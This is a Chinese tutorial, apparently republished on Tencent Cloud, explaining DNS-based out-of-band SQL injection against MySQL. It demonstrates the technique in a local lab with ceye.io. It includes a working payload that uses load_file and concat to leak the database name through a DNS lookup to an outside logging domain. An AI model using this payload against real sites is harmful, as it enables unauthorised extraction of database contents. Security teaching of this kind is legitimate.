Dns注入

为什么要使用DNS注入?

盲注跑数据太慢的情况下,可以选择DNS注入

DNS注入的原理?

域名DNS指向的是我们服务器的域名,意味着解析域名时需向DNS服务器查询。通过递归查询可以获取数据库上的信息。要记住整个域名内的节点标签被限制在63个字符长度大小。

使用条件:

1. 有sql注入点

2. 该站点的load_file可以使用

演示:

本地搭建phpstudy环境

然后注册一个ceye.io的账号,作为dns注入的平台

用到的东西呢就是下图中画圈的

这是一个域名:

分析一下:

Ceye.io 就不用说了,

前面的 xxxx.ceye.io是你的个人域名

Dns注入最后的效果呢就是在xxxx.ceye.io前面显示你注入的结果。例如:

你得到的数据库是test

那么效果则是:test.xxxx.ceye.io

好的,废话不多说,实例演示

使用到的语句呢就是下面这条:

and if((select load_file(concat('\\\\',(select database()),'.eq6w9l.ceye.io\\abc'))),1,0)

分析一下:

And 就不多说了,连接前后语句嘛!

If(1,2,3)这个函数,里面是三个条件,如果1这个位置是true那么执行2位置语句,否则执行3位置语句。

我们都知道,load_file是可以读取文件的,那么,我们把这个文件换成可执行的语句呢?

再说一个小知识点,\\xxxxx.xxxxxx

如果说我们在下图位置写这个东西呢,就会执行这个后面的域名吧!

同理,你在load_file中写这个也是会执行的,所以就利用这个特点进行的dns注入。

'\\\\',(select database()),'.eq6w9l.ceye.io\\abc'

首先前面的\\\\实际上是两个\其中两个是作为转义符号来的,然后(select database())是真正的执行语句,然后后面拼接上你的域名,最后面加的\\abc,实例发现,后面不加\\abc或者\\其他字符是无法进行dns注入的,必须加上\\abc或者\\aaa等等都可以,但是记住一定要加。

Ok,payload已经写好了,就执行吧!

效果

那么究竟对不对呢?

我们联合注入看一下:

Dns注入呢到这里基本已经算是ok了!

其他的语句也同样一样!

本文分享自微信公众号 - Ms08067安全实验室(Ms08067_com)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-06-17

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏Java工程师成长之路

Mybaits-plus实战(三)

12920
来自专栏奔跑的人生

优化数据库的方法及SQL语句优化的原则

4、SQL语句语法的优化。(可以用Sybase的SQL Expert,可惜我没找到unexpired的序列号)

8620
来自专栏奔跑的人生

最受欢迎的ASP.NET的CMS下载

引用自:http://www.csdn.net/article/2011-11-28/308172

34030
来自专栏程序员一一涤生

Hibernate saveOrUpdate方法到底是怎么执行的?

  saveOrUpdate方法,如果传入的对象有主键就执行更新,没有就执行新增。这句话误导了很多人。

14220
来自专栏运维经验分享

mongodb查询的语法(大于,小于,大于或等于,小于或等于等等)

$gt:大于 $lt:小于 $gte:大于或等于 $lte:小于或等于 例子: db.collection.find({ "field" ...

27820
来自专栏程序员一一涤生

Oracle 中 sys和system帐号的区别

  安装完成oracle后,通常都会发现有2个系统级别的帐号可以登录,但从来没有考虑过这2个帐号之间有什么区别,后来从一位老师那里得知了区别所在,便记录下来。

8810
来自专栏鸿的学习笔记

简单聊聊数据一致性这个概念

今天这篇笔记是讨论数据一致性概念的文章,作者是大名鼎鼎的All Things Distributed博客博主,AWS的CTO Werner Vogels。文章完...

11610
来自专栏Java工程师成长之路

apollo入门demo实战(二)

  通过上述测试已经实现了后台页面配置实时修改,客户端实时接收修改配置值,我们已经初步了解apollo的基本功能,接下来需要研究下客户端需要如何配置才能实现需求...

15330
来自专栏Java工程师成长之路

美团点评CAT监控平台研究

支持 Transaction、Event、Heartbeat、Metric 四种消息模型

21420
来自专栏changxin7

MySQL的安装、启动和基础配置 —— linux版本

http://repo.mysql.com/yum/mysql-5.6-community/

7510

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励